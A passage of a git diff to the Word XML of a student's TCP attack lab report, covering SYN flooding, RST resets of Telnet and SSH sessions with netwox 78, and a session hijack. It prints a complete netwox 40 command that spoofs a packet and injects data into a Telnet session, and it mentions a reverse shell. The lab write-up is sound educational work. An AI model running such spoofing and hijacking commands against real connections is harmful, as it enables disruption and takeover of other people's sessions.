--- a/Lab4/report.docx
+++ b/Lab4/report.docx
@@ -13,8 +13,6 @@
           <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -678,9 +676,76 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:ind w:left="1080"/>
-      </w:pPr>
+        <w:spacing w:after="0"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>SYN Flooding Attack</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The successful execution of the flooding attack is observed by a series of half-open TCP SYN connections being displayed when </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>netstat -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> is executed. Furthermore, a connection request from </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>leg</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>vic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> is not answered as seen by the repeated time outs.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> This connection is finally established when the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DoS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> attack is ended, and the total time to connect is significantly higher than usual (31 versus 0.09 seconds).</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -710,6 +775,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">In the </w:t>
       </w:r>
       <w:r>
@@ -759,13 +825,13 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:keepNext/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3793D761" wp14:editId="3DBA8486">
             <wp:extent cx="4181475" cy="1476375"/>
@@ -805,6 +871,26 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>6</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> Telnet connection in leg terminal</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:ind w:left="1080"/>
         <w:jc w:val="both"/>
@@ -895,6 +981,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:keepNext/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
@@ -940,6 +1027,42 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>7</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Netwox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 78 attack in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>att</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> terminal</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:ind w:left="1080"/>
         <w:jc w:val="both"/>
@@ -959,6 +1082,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:keepNext/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
@@ -1004,6 +1128,26 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>8</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> Telnet connection in leg terminal</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:ind w:left="1080"/>
       </w:pPr>
@@ -1088,10 +1232,8 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:keepNext/>
         <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1136,11 +1278,41 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>9</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> SSH connection in </w:t>
+      </w:r>
+      <w:r>
+        <w:t>leg</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> terminal</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:ind w:left="1080"/>
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">In the </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -1238,10 +1410,8 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:keepNext/>
         <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1286,6 +1456,45 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>10</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Netwox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 78 attack in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>att</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> terminal</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:ind w:left="1080"/>
         <w:jc w:val="both"/>
@@ -1305,16 +1514,13 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:keepNext/>
         <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="266952FD" wp14:editId="31A16F1B">
             <wp:extent cx="3552825" cy="904875"/>
@@ -1354,9 +1560,26 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:ind w:left="1080"/>
-      </w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>11</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> SSH connection in leg terminal</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1381,6 +1604,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:keepNext/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
@@ -1426,6 +1650,26 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>12</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> RST attack on Telnet connection packets in Wireshark</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
@@ -1437,6 +1681,9 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:keepNext/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -1480,14 +1727,352 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:tabs>
+          <w:tab w:val="center" w:pos="4680"/>
+          <w:tab w:val="left" w:pos="7860"/>
+        </w:tabs>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>13</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> RST attack on SSH connection packets in Wireshark</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>TCP RST Attacks on SSH and TELNET Connections</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>I observe that the attack is successful by observing the</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> spoofed</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> RST packet</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">s transmitted from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>vic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>leg</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">from </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>att</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. To terminate the telnet connection, packets are directed to port 23 and for SSH connections, packets are directed to port 22.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">By entering a command in the SSH and telnet connection in </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>leg</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, the `Connection reset by peer` and `Connection terminated by foreign host` message is displayed in the respective terminals and the connection is </w:t>
+      </w:r>
+      <w:r>
+        <w:t>ended</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="2"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>???</w:t>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>netwox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 40 --ip4-offsetfrag 0 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 10.0.0.2 --ip4-dst 10.0.0.3 --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>tcp-src</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 45</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>534</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>tcp-dst</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 23 --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>tcp-seqnum</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>3624306446 --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>tcp-acknum</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 88133758</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>-ack --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>tcp-psh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>-window 57 --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
+        </w:rPr>
+        <w:t>-data "7077640d00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A1C8BD3" wp14:editId="542CE19D">
+            <wp:extent cx="4648200" cy="3324225"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="21" name="Picture 21"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4648200" cy="3324225"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>14</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Netwox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 40 command with reverse terminal payload data</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1498,12 +2083,846 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:r>
-        <w:t>???</w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77413958" wp14:editId="1C41CC13">
+            <wp:extent cx="5448300" cy="5600700"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="14" name="Picture 14"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5448300" cy="5600700"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>15</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> Wireshark trace after telnet connection from leg to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> terminal</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55242D7B" wp14:editId="67F1B54D">
+            <wp:extent cx="5715000" cy="6438900"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="16" name="Picture 16"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5715000" cy="6438900"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>16</w:t>
+        </w:r>
+      </w:fldSimple>
+      <w:r>
+        <w:t xml:space="preserve"> Wireshark trace after successfully creating a reverse shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>TCP Session Hijacking</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>The hijack was carried out by following these steps:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Open the telnet port 23 in vic. (Figure 17)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Create a telnet connection from leg to vic. (Figure 18)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
